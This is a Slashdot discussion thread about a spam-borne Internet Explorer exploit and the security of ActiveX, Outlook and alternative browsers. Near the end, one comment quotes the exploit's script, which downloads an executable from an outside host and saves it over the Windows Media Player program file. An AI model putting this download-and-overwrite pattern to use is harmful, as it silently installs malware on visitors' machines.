      "She's a scientist and a lesbian. She's not going to let it slide." Orphan Black
  10. The most frightening bit here by Rope_a_Dope · · Score: 5, Interesting

    ActiveX actually lets a webpage rewrite your wmplayer.exe file with its own version. If an ActiveX control can rewrite any executable on a Windows box, then I assume that any piece of the Windows kernel is vulnerable. This leads to a larger question, which is, "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?".

    1. Re:The most frightening bit here by ggvaidya · · Score: 5, Informative

      I think you have to be Administrator for the re-write to work. Then again, most of the people I know run as administrator, so ...

    2. Re:The most frightening bit here by bhtooefr · · Score: 4, Informative

      There's Trend Micro's HouseCall, which is an ActiveX applet that runs virus scans. Actually, most diagnostic web sites have ActiveX. Also, PowerLeap's InSPECS system requires IE with ActiveX enabled.

    3. Re:The most frightening bit here by CdBee · · Score: 5, Interesting

      "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

      (MSN) Chatrooms and Windowsupdate spring to mind as web-based uses of ActivX. Microsoft's decision to ship no Java Virtual Machine in Windows XP doesn't seem to have brought any more users into ActivX chatrooms though, I've seen chatroom moderators recommending users to download Mozilla :-)

      One extra worrying thing though, when you go into an MSN Groups chatroom with Mozilla on Windows, to install the ActivX control for the chatroom you have to install Microsoft ActivX Wrapper for Netscape

      Potentially, Mozilla users are now affected by ActivX insecurities if they accept this download.

      --
      I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
    4. Re:The most frightening bit here by moonbender · · Score: 1

      I assume windowsupdate.microsoft.com uses an ActiveX component, as well.

      --
      Switch back to Slashdot's D1 system.
    5. Re:The most frightening bit here by FSWKU · · Score: 3, Insightful

      Actually, there are legitimate uses for ActiveX. One example being the Remote Desktop Web Client. It's a simple little ActiveX control that lets you log into your computer without having to install the terminal services client. While I would love to be able to get rid of that, it really isn't possible. The "engineer" where I work is a paranoid dolt who insists that no one should ever be allowed to install anything on any of the computers in the office (including popup killers...imagine the horror) and won't upgrade the machines (933mhz systems) to anything higher than Win98. Come to think of it, it's somewhat of a miracle that I can even remote into my system at all from there.

      --
      "So after all this, you make my case for me. To end this stalemate, you must die..."
    6. Re:The most frightening bit here by lordDallan · · Score: 5, Interesting

      The better question is why does Windows XP Home only have two user types, a totally crippled limited user (i.e. sh*t doesn't work half the time - so nobody uses it) or a full power, overwrite anything, viruses-be-damned administrator.

      Basically, by having only these two types of users (and not a happy compromise like Win 2K's "Power User"), Microsoft has virtually guaranteed that home users on their newest OS will remain vulnerable to exploits.

      If MS wants to do something really helpful to Windows security in their next Service Pack, they should add a "Power User" account type to Windows XP Home.

    7. Re:The most frightening bit here by mao+che+minh · · Score: 1

      That's the thing about ActiveX: as long as it is signed (and not expired), or you decide to trust it anyways, ActiveX has whatever permissions the user that is launching it does. Pretty fucking stupid, huh?

    8. Re:The most frightening bit here by SlashDread · · Score: 3, Insightful

      Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch to a normal user in a blink..

      "/Dread"

    9. Re:The most frightening bit here by kinnell · · Score: 2, Informative
      Is there anybody that actually uses ActiveX on a webpage

      I'm forced to use IE at work with the "prompt before accepting activeX components" option turned on. You think pop-ups are bad, you should try this! It seems to be used for any kind of plugin (flash, etc), and most pages with adverts, even slashdot, contain activeX of some kind. It really highlights how dangerous IE is - even when you're prompted, you don't know what you're accepting - you could be trying to view a PDF file - and if you accept it you are compromising your system, even if it's just user files at risk. When you consider the number of people routinely running potentially dangerous activeX components without realising it just by surfing the internet...it's unbelievable.

      --
      If I seem short sighted, it is because I stand on the shoulders of midgets
    10. Re:The most frightening bit here by Anonymous Coward · · Score: 2, Informative

      > and not a happy compromise like Win 2K's "Power User"

      Power User is pretty powerful. I believe it can overwrite files in the Program Files folder, so is almost as dangerous as Administrator. I'm usually running as Restricted User on Win2K, the RunAs service works reasonably well for installing new software or tinkering in Computer Manager.

    11. Re:The most frightening bit here by Threni · · Score: 2, Informative

      > Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, id switch
      > to a normal user in a blink..

      Can't you log on as a normal user and then do a `run as administrator` on it?

    12. Re:The most frightening bit here by 0123456 · · Score: 1

      Yeah, agreed: I tried running with that option on for a while, and IE was basically unusable. Of course that was before I switched to Mozilla.

    13. Re:The most frightening bit here by jodio · · Score: 3, Informative

      XP does have "power user"

    14. Re:The most frightening bit here by LostCluster · · Score: 3, Informative

      ActiveX is not sandboxed at all like Java is. So, like any powerful tool, it can be used for both good and bad.

      Windows Update depends on ActiveX to determine which updates a user already has. Many virus-scanning websites need to be able to read (and when cleaning, write to) every file on the system, so they need ActiveX too.

      When it comes down to it, ActiveX controls are just as powerful as any other executable, which is why the user is presented with a security certificate before they run. I think the critical flaw in ActiveX is right there at that dialog box, because the default answer is "Yes" and users don't read the whole thing to understand what it means.

    15. Re:The most frightening bit here by DAldredge · · Score: 1

      I know that that doesn't work for NeverWinter Nights. You have to be logged in as Admin for that to work.

    16. Re:The most frightening bit here by smellystudent · · Score: 1

      It is indeed a miracle! How the heck did you get Remote Desktop installed on Windows 98?

      --
      Predictive text is shiv!
    17. Re:The most frightening bit here by just+fiddling+around · · Score: 2, Insightful

      Another flaw: I get to check "always trust Hackerboy" box, but there is no "never trust Hackerboy" box for me to check. Would work wonders on my blood pressure...

      --
      You're not old until regret takes the place of your dreams.
    18. Re:The most frightening bit here by Anonymous Coward · · Score: 0

      You're mistaken. It uses VB-Script.

    19. Re:The most frightening bit here by kisrael · · Score: 3, Insightful

      You know, that kind of asymmetry shows up a few places in Windows, and it's always annoying.

      Like, I think it's a File Replace dialog, "Yes" / "Yes to All" / "No" / "Cancel"

      Why is there "No to All"? It's not quite as useful as "Yes to All", but you could easily think of some scenarios where you want to add in new files but don't want to try and overwrite any files that are already there...

      --
      SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
    20. Re:The most frightening bit here by Technician · · Score: 1

      Windowsupdate spring to mind as web-based uses of ActivX.

      That explains the Error in line ... message I get when I visit Microsoft.com with active-X off. I thought they were just bad HTML coders.

      --
      The truth shall set you free!
    21. Re:The most frightening bit here by LostCluster · · Score: 1

      "No to all" would be redundant to "Cancel". Both would immediately stop the operation with no further questions.

    22. Re:The most frightening bit here by moonbender · · Score: 2, Informative
      From the Windows Update FAQ (my markup):
      What is an ActiveX control?
      ActiveX Controls are reusable software components that incorporate ActiveX technology. These components can be used to add specialized functionality, such as animation or pop-up menus, to Web pages, programs, and software development tools. Windows Update uses ActiveX controls to check what software is installed on your computer in order to provide you with a correct list of updates and other software you may want to download.
      Also, try disabling ActiveX in IE and running Windows Update - doesn't work. That's not to say it doesn't use VBScript in addition to ActiveX, of course.
      --
      Switch back to Slashdot's D1 system.
    23. Re:The most frightening bit here by kisrael · · Score: 4, Interesting

      "No to all" would be redundant to "Cancel". Both would immediately stop the operation with no further questions.

      No it wouldn't be redundant, different behaviors are implied, since it's not "No to ALL files I selected to copy", it's "no to all files with a name collision"

      I'm thinking of copying a bunch of files (say, W, X, Y, and Z) into a directory that already has some files with the same name. (say, X and Z)

      W copies fine.
      X brings up that dialog:
      "Yes"--copy X, copy Y, ask about Z
      "Yes to all"--copy X, copy Y, copy Z
      "No"--skip X, copy Y, ask about Z
      "No to all"--skip X, copy Y, skip Z
      "Cancel"--skip X, skip Y, skip Z

      Now, this is obviously a trivial example, but if you have a large number of files, where you want all the files that were in the source directory but don't want any existing file in the destination directory changed, the asymmetry in the dialog is annoying.

      --
      SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
    24. Re:The most frightening bit here by Anonymous Coward · · Score: 0

      "There's Trend Micro's HouseCall, which is an ActiveX applet that runs virus scans. Actually, most diagnostic web sites have ActiveX. Also, PowerLeap's InSPECS system requires IE with ActiveX enabled."

      And running code you find on a website is a way of avoiding virusen?

    25. Re:The most frightening bit here by misleb · · Score: 2, Interesting
      Windows Update depends on ActiveX to determine which updates a user already has. Many virus-scanning websites need to be able to read (and when cleaning, write to) every file on the system, so they need ActiveX too.

      Maybe it is time the world gave up on these mega-web-applications. Why can't Microsoft write a damn standalone Windows Update application that doesn't use a browser.... like Apple does on OS X? Why does everything need to be web based these days? Sandbox the damn ActiveX crap, restrict user privileges by default, tighten Explorer security settings BY DEFAULT, and ship a standalone app for everything that you can. If Microsoft wants to improve security, they are ultimately going to have to stand up to users and say, "You know what? We will only trade so much security for convenience. Deal with it."

      -matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    26. Re:The most frightening bit here by abb3w · · Score: 1

      "Is there anybody that actually uses ActiveX on a webpage, and if not, why doesn't Microsoft completely eliminate ActiveX from Internet Explorer?"

      To answer both of those questions: Microsoft Windows Update is DirectX based.

      --
      //Information does not want to be free; it wants to breed.
    27. Re:The most frightening bit here by HD+Webdev · · Score: 1

      I know that that doesn't work for NeverWinter Nights. You have to be logged in as Admin for that to work.

      Install the application into your non-admin user "/documents and settings/whoever" area instead of "/program files".

      --
      This is not a dream, not a dream...we are transmitting from the year 1-9-9-9.
    28. Re:The most frightening bit here by Anonymous Coward · · Score: 0

      I work for a large, allegedly tech-savvy company. Every one of the tens of thousands of laptops we distribute to employees has the user running as Administrator.

    29. Re:The most frightening bit here by badzilla · · Score: 3, Informative

      I try and make my kids run using an account without Administrator rights on their games machine, unfortunately that is a complete nightmare. Every few minutes it's "Dad... I can't install Megablaster 2 Railgun Edition" or "Dad... Flopsy Bear Print Studio says access denied".

      And this is after spending a great deal of time putting friendly NTFS permissions onto their "c:\games" directory. If only makers of entertainment software would clean up their act! Surely these things don't actually NEED to have root all over the place.

      --
      "Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
    30. Re:The most frightening bit here by Anonymous Coward · · Score: 0

      there's an 'e' in ActiveX.

    31. Re:The most frightening bit here by pavera · · Score: 1

      They very well might...
      the most common reason why programs need to be run as admin is because they need read or write access to the registry in a place that normal users don't have it. In my experience, this has almost always been the case that things want to create a new key in the registry (for a saved game, or for a recent document or something) and they can't write to the registry as a normal user.

    32. Re:The most frightening bit here by FSWKU · · Score: 1

      My personal system is XP Pro. The computers in the office are Windows 98. I simply log in to a webserver containing the Terminal Services Web Client (running on Apache, btw). Alternatively, you can also install the standalone TS client for 98. Can't use the second option due to the aforementioned paranoid dolt turning into Satan himself if he finds out you installed ANYTHING (thankfully we're moving to a new location he has no control over).

      --
      "So after all this, you make my case for me. To end this stalemate, you must die..."
    33. Re:The most frightening bit here by filmsmith · · Score: 1
      I enjoy the OS X way of handling it.

      An Item named 'Foo' already exists in this location. Do you want to replace it with the one you are moving?
      (Check box) "Apply to all" --button 1 "Don't Replace" --2 "Stop" --3 "Replace"


      Very informative and useful.

      fs
    34. Re:The most frightening bit here by Anonymous Coward · · Score: 0

      It's hidden. Hold shift (or was it control?) and click on "No". There ya go.

    35. Re:The most frightening bit here by kisrael · · Score: 1

      Yeah, a checkbox plus 3 buttons is probably better than 5 buttons.

      Course, to this Windows'ed guy, it seems like the most action-y, 'positive' button should be to the left, with the "stop all this" button (aka Cancel) to the right, but still

      --
      SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
    36. Re:The most frightening bit here by filmsmith · · Score: 1

      I agree...mostly. The positive "LET'S DO IT!" (or, in some instances, replace 'positive' with 'safe') button always hangs out on the right in the Mac world, but for every dialog there's always distance between the 'Do It' and the 'Wooah, son!' button.

      This particular dialog, however, has it all stacked as I wrote it, on one line all in a row. Bad move, in my opinion. Isolate the Apply to All on its own line and throw the "Replace" at the far left of the box, then some space, then "Stop" and "Do Not Replace"

      There are other flaws with this dialog box, but not in its intent, just its coding and so I'll not go into them here, but that checkbox really does hook it up. Before they revamped that dialog, I envied the windows users with their "Yes to All" button.

      fs

    37. Re:The most frightening bit here by dustmite · · Score: 1

      After pondering how truly mind-numbingly amazing it is that a company with so much money, resources, programming talent, knowledge, and (they claim) the will, still have such a ridiculous insecure operating system. And I've slowly, eventually come to the conclusion that Microsoft do not want to make a secure desktop operating system. Their strategy is simple: allow the Internet to become one huge, sticky mess of popups, security problems, spammers, hackers, virii, bank account info theft, etc that the Internet eventually becomes almost intolerable for ordinary users to use (we're getting there). Then just when people can't stand it anymore, they will "come to everyone's rescue": they will make a big announcement that they intend to replace all the (horribly insecure) OLD (standard) Internet protocols (that are supposedly allowing spammers/hackers etc to flourish), with new, super-secure, super-proprietary Microsoft-specific standards! And just in time for Longhorn/DRM .....

      It's the old scam of letting a tame lion loose in the town square, scaring the people, then becoming the town hero when you catch the lion.

      And people will fall for it, hook, line and sinker. Just like people really believe today that Microsoft were the innovative company that first "made computers user-friendly", someday they will really believe that Microsoft were the innovative company that "made the Internet secure".

      Think about it ... even the fact that Microsoft have begun making all these noises about "trusted computing", and have even recently started making noises about "getting rid of the spam problem".

    38. Re:The most frightening bit here by kisrael · · Score: 1

      Heh, I'm having flashbacks to
      [A]bort, [R]etry, [F]ail ?

      style messages. Looking back, I can kind of guess what's the difference between Abort and Fail (kill the program vs let it go on, hopefully realizing it failed) but man....those really were dark ages of UI

      --
      SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
    39. Re:The most frightening bit here by jafiwam · · Score: 1

      In NT4, you can hold down the shift (or is it ctrl?) key while pressing "NO" to get "No to All".

      I don't know about later versions though.

      It's a really useful feature when you find a more compressed version of some porn jpgs you want to add to your higher quality, less compressed partial set.... or something like that.

    40. Re:The most frightening bit here by JurgenThor · · Score: 0

      Windows XP finally has a 'No To All' for a lot of these operations. I danced the crazy-happy-dance when I saw it. Also, some of its dialogs have a checkbox with the meaning of "use this answer for the rest of the questions". Sure, they're not consistent, but at least they've GOT them finally. Still waiting on dialogs with verbs for buttons (ala Macs - 'Replace', 'Replace All', 'Don't Replace', 'Don't Replace All'), rather than the oft convoluted description of which button to click.

      --
      GENERAL PUBLIC SIGNATURE (GPS) Any replies (derivatives) of this post must also use the GPS
    41. Re:The most frightening bit here by Kaki+Nix+Sain · · Score: 1
      I have considered a similar but slightly less horrible idea before. Perhaps they don't do it for such a far reaching "take over the world" reason. However, by not putting a pop-up blocker in IE, Microsoft has generated revenue for tons of companies that have developed and sold them. Similarly, the lack of security helps the developer community for Microsoft's platform by giving them problems with easy solutions and a captive market of people with those problems.

      If you solve all the customer's problems then you don't see that customer again.

      --

      (C) Kaki Sain, 2011. By reading this, you have illegally copied my property to your brain.

    42. Re:The most frightening bit here by lizrd · · Score: 1
      In my experience, this has almost always been the case that things want to create a new key in the registry (for a saved game, or for a recent document or something) and they can't write to the registry as a normal user.
      These are prime examples of things that should be written to HKCU and not HKLM. The fact that they need Admin access to store user data shows why they are doing things wrong. It also shows how the concept behind a desktop PC is that it will be used by a single person and therefore doesn't need to separate program data from user data.

      It's hard to overcome this, since the concept of multiple users and separation between them doesn't really make all that much sense on a personal computer.

      --
      I don't want free as in beer. I just want free beer.
    43. Re:The most frightening bit here by Imperator · · Score: 1

      Have you ever seen XP Home? You don't have access to the W2K-style users and groups MSC plugin. There really are only two account types for users: administrator and crippled. Oh, and I think there's a "guest" account you can activate. I don't know if the full API is still there and you just need a third party app, but at least by default it's not easy to create non-admin users that can actually do anything.

      --

      Gates' Law: Every 18 months, the speed of software halves.
    44. Re:The most frightening bit here by Threni · · Score: 1

      You need to get a completely separate partition for them to boot into, with a boot-time menu, or at the very least a separate account for them.

      If you look on the net there's quite a few sites detailing the problems with people's attitude to security. "security is a process not a product" and all that.

    45. Re:The most frightening bit here by zero_offset · · Score: 1
      Microsoft's decision to ship no Java Virtual Machine in Windows XP

      That "decision" was made for them by a court. In other words, Sun managed to litigate a preinstalled VM off of the most popular and ubiquitous platform in the history of computing. This is something industry experts refer to as "stupid".

      --

      Slashdot quality declines as the number of hot grits posts decreases. - Provolt's Law, Apr-09-2005

  11. Re:e-cards by toasted_calamari · · Score: 5, Interesting

    What really annoys me about e-cards is that even the legitimate ones look like spam, so much so that not only does the spam filter flag them, but I have trouble deciding if someone is being nice to me or trying to exploit my system.

    With regards to the article, that's definitely one of the nastiest browser exploits I've seen in a long time, makes me glad I don't use windows and IE.

  12. It'd be scary if I ran my PC as Administrator... by gfecyk · · Score: 2, Insightful

    ...and if I was stupid enough to actually install the crapware the strange website/email/stranger gave me.

    --
    Use Evolution instead of Outlook? Bewa
  13. Spylog is not spyware! by tgma · · Score: 5, Informative

    While I commend the original article as an interesting dissection of an attempted attack via spam, the heading is a little sensational. It mentions Russian spyware sites, but the site in question is Spylog.com, a reputable Russian monitoring site. Not everything on the Russian internet is malicious, and Spylog does some good work on reporting statistics about the Russian internet.

    Just a minor correction.

    1. Re:Spylog is not spyware! by randyest · · Score: 0, Flamebait

      Did you RTFA? I did, and failed to find anything untoward or even mildly "sensational" about the spylog section. There is no mention of any "Russian spyware site(s)" anywhere, and exactly one reference to Russia, which says:

      Despite its malicous sounding name, all this file contains is the tracking code provided by a russian company, spylog.com. I couldn't figure out how to view the stats that are being compiled by spylog, but the author no doubt has access to these stats and can use them to figure out how many computers he has hijacked.

      Exactly what part of the above (benign) description do you think you "corrected" via your post?

      --
      everything in moderation
    2. Re:Spylog is not spyware! by mlefevre · · Score: 1

      tgma apparently did RTFA, as they say "I commend the original article". tgma is complaining about the slashdot story, where the submitter has introduced a mention of "Russian spyware sites".

    3. Re:Spylog is not spyware! by Ant2 · · Score: 1

      Hmmm...if Spylog were collecting data from my machine without my permission, I'd consider that spyware. But, hey, that's just me.

    4. Re:Spylog is not spyware! by Anonymous Coward · · Score: 0

      the same data that ANY site could detect and most do when you visit... get real here.

  14. Russian spyware. by sorlov · · Score: 2, Informative

    Once again /. offers excellent analysis. spylog.com is not spyware. It's site statistics. In fact the article author says spylog.com is used to gather statistics. Slashdot editors don't read the articles?

    1. Re:Russian spyware. by Chuck+Bucket · · Score: 4, Funny

      you must be new here.

      CB

    2. Re:Russian spyware. by thestarz · · Score: 1

      Slashdot editors don't read the articles?

      Read the article? That's crazy talk!

      --

      c++; /* this makes c bigger but returns the old value */
    3. Re:Russian spyware. by DR+SoB · · Score: 1

      "Once again /. offers excellent analysis. spylog.com is not spyware. It's site statistics. In fact the article author says spylog.com is used to gather statistics. Slashdot editors don't read the articles?" Yeah, what the HELL.. That's not spyware!!! Who would have thought that people keeping statistics on me, without my knowledge, from some application that has installed itself on my computer in the background, would be called SPYWARE.. You /. editors just don't have a CLUE do you?! *cough* *LAUGH* ok, I couldn't hold it in.. Seriously SORLOV, why don't you look up the definition of spyware, before posting such trash? I mean, the name "SPYLOG" pretty much should sum it up for you. Maybe if they called it "THISISFUCKINGSPYWAREYOUSTUPIDPIECEOFSHIT.EXE" you'd think "umm, it's just keeping harmless statistics".. Do you really want ANYTHING from RUSSIA installed on your computer? Now do you want ANYTHING with the word "SPY" installed on your computer? How about anything from russia with SPY in it.. Nope, you're right...harmless.. (Now THAT was a rant!)

      --
      Mod +5 Drunk
    4. Re:Russian spyware. by MotherInferior · · Score: 1
      (Now THAT was a rant!)

      A decidedly silly and pointless rant, but one nonetheless.

  15. Active X by g0bshiTe · · Score: 0

    Active X through IE has always been able to execute code on a Windows box as the user logged in. There's nothing new about that. It looks to me like it could be an attempt to upload and install the HIJACKTHIS trojan.

    --
    I am Bennett Haselton! I am Bennett Haselton!
  16. A little bit unfair to Outlook by DoorFrame · · Score: 4, Interesting

    This story is presented as an example of the bad things that can happen from opening spam in Outlook ("If you're still using Outlook and Internet Explorer, this is a good time to find alternatives"). But the story doesn't point to any actual issue with Outlook, only exploits in Explorer that allow downloaded code to be executed remotely. The Outlook bashing seems out of place.

    1. Re:A little bit unfair to Outlook by GigsVT · · Score: 5, Informative

      How do you think Outlook displays mail? Last I checked, it embeds the IE control.

      --
      I've had enough abrasive sigs. Kittens are cute and fuzzy.
    2. Re:A little bit unfair to Outlook by ncr53c8xx · · Score: 2, Informative
      How do you think Outlook displays mail? Last I checked, it embeds the IE control.

      It gets worse. Microsoft does not provide a standalone download to update IE. The only way to get the update is to run the stub they provide which starts up IE as Administrator!! No wonder many machines get p0wn3d during patching.

    3. Re:A little bit unfair to Outlook by ONOIML8 · · Score: 1

      Do they really? I've often wondered about that. It seems so ironic that you could set out to do a security update and open yourself wide open for a good shafting in doing so.

      I'm not sure it's good to know that my paranoia is reality on that one.

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
  17. At what point by GigsVT · · Score: 5, Insightful

    Does this stuff get treated like a virus/trojan, rather than legitimate business?

    If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.

    It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).

    People actually get pissed off when we tell them they can't have weatherbug on their computer.

    --
    I've had enough abrasive sigs. Kittens are cute and fuzzy.
    1. Re:At what point by Paisley+Phrog · · Score: 2, Informative

      then it's OK for you to write viruses and trojans (like weatherbug).

      From everything I've read, WeatherBug isn't a trojan...it's adware and will put banners on your desktop for the service it provides, but they're rather up-front about that.

      Perhaps you mean WeatherCast?

    2. Re:At what point by GigsVT · · Score: 1

      If by upfront, you mean buried near the last page of a very long EULA, then yeah, I'm inclined to agree.

      I actually read the EULA before I told people we couldn't install it, because I hadn't heard of it before they asked, but it sounded sleazy.

      --
      I've had enough abrasive sigs. Kittens are cute and fuzzy.
    3. Re:At what point by Anonymous Coward · · Score: 0

      "FBI or SS arresting the people"

      damn i thought you meant like nazi ss, the Sicherheitsdienst. and i was going to say damn, americans have started resurrecting war criminals to enforce justice?
      i mean it is the next logical step

    4. Re:At what point by mixmasterjake · · Score: 1

      although i don't love it, i don't have a problem with ad-supported software that shows ads while you use it (like weatherbug, opera, etc).

      perhaps it's a fine line, but programs that redirect your searches to an alternate site, pop-up windows while you're not using the product, install other products and links on your desktop, etc. are in a different category than an ad-supported piece of software.

      advertising is annoying, but a legitimate way to earn revenue in exchange for a free piece of software. i'd prefer to save my bashing for the real problem apps, like this credit-card stealing spam.

      --
      TODO: come up with a clever sig
  18. Are there really better alternatives??? by TopShelf · · Score: 3, Insightful

    The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure, or is it just that black hats like this are going after the 90%+ out there using MS products due to the size of opportunity?

    Not trolling, just asking an honest question here.

    --
    Stop by my site where I write about ERP systems & more
    1. Re:Are there really better alternatives??? by nutznboltz · · Score: 1

      Are packages like Firebird really more secure

      Back when there was a Firebird it didn't send or receive mail so, yes, it's incredibly secure.

      A better question: is ThunderFox, er, Thunderbird more secure?

    2. Re:Are there really better alternatives??? by TopShelf · · Score: 1

      My bad - I had finished reading the article, wherein he recommends Firefox and Thunderbird, and thus got mixed up.

      But hey, it's Monday morning...

      --
      Stop by my site where I write about ERP systems & more
    3. Re:Are there really better alternatives??? by aborchers · · Score: 3, Interesting

      The "alternative" clients typically do not do things like run scripts, overwrite files, etc without at least a confirmation from the user. The problem is that IE and Outlook are so feature rich, and so easily configured (historically by default) to gullibly trust any command that comes down the pipe, that they pose a severe risk to exactly the class of users (i.e. inexperienced or ignorant) that most frequently use them.

      So, in effect, yes, there is an aspect to the other clients that is inherently more secure, but users savvy enough to obtain and use them could probably also configure and use most modern MS products fairly securely as well. It is a combination of user behavior and software design security.

      For the record, I find it hard to believe that someone with a 5-digit /. ID could ask this question and not be trolling... ;-)

      --
      Trouble making decisions? Just flip for it.
    4. Re:Are there really better alternatives??? by betelgeuse-4 · · Score: 1

      The Linux/Firefox/Thunderbird (or other F/OSS) solution is probably safer than MS IE/Outlook. However a lot of viruses/worms/trojans etc. rely on a bit of social hacking. If Linux dominated the desktop market, there would be plenty of people who would run as root and chmod +x files from strangers.

    5. Re:Are there really better alternatives??? by TopShelf · · Score: 1

      Just because I've been around here a while doesn't mean I'm an expert in the security features of various browsers. I've just started using Mozilla in the last few months, more for the wonders of tabbed browsing than anything else...

      --
      Stop by my site where I write about ERP systems & more
    6. Re:Are there really better alternatives??? by jfengel · · Score: 5, Insightful

      Security through obscurity never works, but there is something to be said for security through diversity. It works because it lowers the "payoff" of writing worms, perhaps to the point where it's no longer worth the effort.

      Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.

      I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.

      Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.

      Still, having been written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.

      Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.

      Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.

    7. Re:Are there really better alternatives??? by Anonymous Coward · · Score: 0

      heises browsercheck

      has a list of many (if not all) known browser exploits, with demo code.

      Make the conclusion yourself.

    8. Re:Are there really better alternatives??? by ktulu1115 · · Score: 1

      The quick, simple answer: Yes

      The long-winded answer: Yes... Not only is IE known for a long history of insecurity, mostly due to the wonderful company located in Redmond, Washington. We also know that Microsoft loves integration, specifically with their software: which brings you ActiveX and VBScript integration into IE. What a wonderful thing. With administrator rights and the correct (I should say incorrect) privacy settings, skript kiddies can pretty much do what they please with your box - This story being a case-in-point. A quick Google came up with this: IE considered harmful. I do not know the full details of the content in that link, nor do I affiliate myself with the author, but he does bring up several good (and valid) points.

      Now for alternative browsers (I will focus on Firefox). For starters, it's open source (available at cvs.mozilla.org), which IMHO may not make it more secure by itself, but it definitely doesn't hurt. "Security through obscurity" also isn't an issue because of this. It does not have VBScript/ActiveX integration, so you don't have to worry about Mozilla/Firefox overwriting any file on your PC it was told to do by some script. Furthermore, Mozilla wasn't designed to have functionality to do such things in the first place (AFAIK) which obviously means it's not possible, even with a security flaw.

      All of these reasons combined should clearly demonstrate that Mozilla/Firefox is a more secure browser (than IE). I honestly don't believe anyone could think otherwise.

      --
      # fuser -v /dev/attention | grep work
      #
    9. Re:Are there really better alternatives??? by cuiousyellow · · Score: 1

      Ah, a security-through-obscurity hater. It certainly hasn't worked for MS Outlook or Internet Explorer so I understand your reservations.

      Assuming honest intentions as declared, the straight answer is "yes".

      Outlook + IE users are in the bullseye of a majority of worm authors and getting out of range altogether is only a step away.

      Saner advice would be to suggest that MS modify OfficeUpdate patching to suggest copying the cd to the user's HD so that they won't need it again and to integrate it into their auto-downloader -- Outlook users have already decided upon a feature set and suggesting they made the wrong choice is going to be ignored.

    10. Re:Are there really better alternatives??? by Anonymous Coward · · Score: 0

      Yes, they are.

      Firefox, the browser, doesn't support ActiveX or VBScript. It supports JavaScript instead. The latter runs in a sandbox which prevents it from writing files to disk without specific permission. This evidently doesn't apply to ActiveX, I don't think it applies to VBScript either. Also JavaScript can be turned on and off for specific sites with Firefox. Firefox also blocks unwanted popups and can limit certain JavaScript actions used for malicious purposes.

      Also FireFox generally has a better security record (it wasn't affected by the recent %00 URL re-writing bug for example).

      Thunderbird has a built-in set of filters for removing spam. These can learn the difference between spam and non-spam and are thus better than most at eradicating most spam mails. This system of Bayesian filters has been so successful that Microsoft has announced that it will be added to the next version of Outlook.

      Also Thunderbird doesn't support VBScript, and uses the same core browsing component as Firebird for displaying pages. It can also be set up so it never displays HTML email.

      The absence of VBScript and ActiveX may sound like a flaw in these two pieces of software, but in practice they have rarely been used for legitimate purposes. I've been using Firefox and Thunderbird for quite a while now without any problems.

      Note, in the interests of fairness, I should say that you can disable ActiveX in Internet Explorer, however the last time I used IE, ActiveX was still on by default. This may have changed with the security push at Microsoft. But Firefox has less security breaches in general, is still under active development, and is better out of the box.

    11. Re:Are there really better alternatives??? by orthogonal · · Score: 5, Interesting
      The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure...?

      Fire{WHATEVER_WEEK_THIS_IS} doesn't, so far as I know, do this:

      var x = new ActiveXObject("Microsoft.XMLHTTP");
      x.Open("GET", "http://adversting.co.uk/a.exe",0);
      x.Send();

      var s = new ActiveXObject("ADODB.Stream");
      s.Mode = 3;
      s.Type = 1;
      s.Open();
      s.Write(x.responseBody);

      s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

      That is, allow a script to create a new instance of the browser's internal engine, run an HTTP GET with it, and save the resulting datastream as an executable file.

      No browser should ever have been written with the ability to do this, and worse yet, IE does it without a single warning to the user!

      Go to web-site, get a new OS!

      And to make it even more ridiculous, it's in a textarea that thanks to a Microsoft extension is not displayed! Did no one at Microsoft stop to think that there's no good reason to have a hidden textarea (as opposed to a hidden input tag)?

      To the contrary, they considered it a positive feature! Why? Because Visual Basic "programmers", a core Microsoft constituency -- I don't mean to be harsh, I'm largely self-taught myself, but it has to be said -- some Visual Basic programmers might well not be educated enough to save a key value in a hidden field (to present later to the server, essentially as a "cookie" with the lifetime of one form GET to POST cycle), and instead might save a whole freaking block of text. And so Microsoft accommodated the lowest common denominator of Frontpage wizard user turned self-styled "programmer".

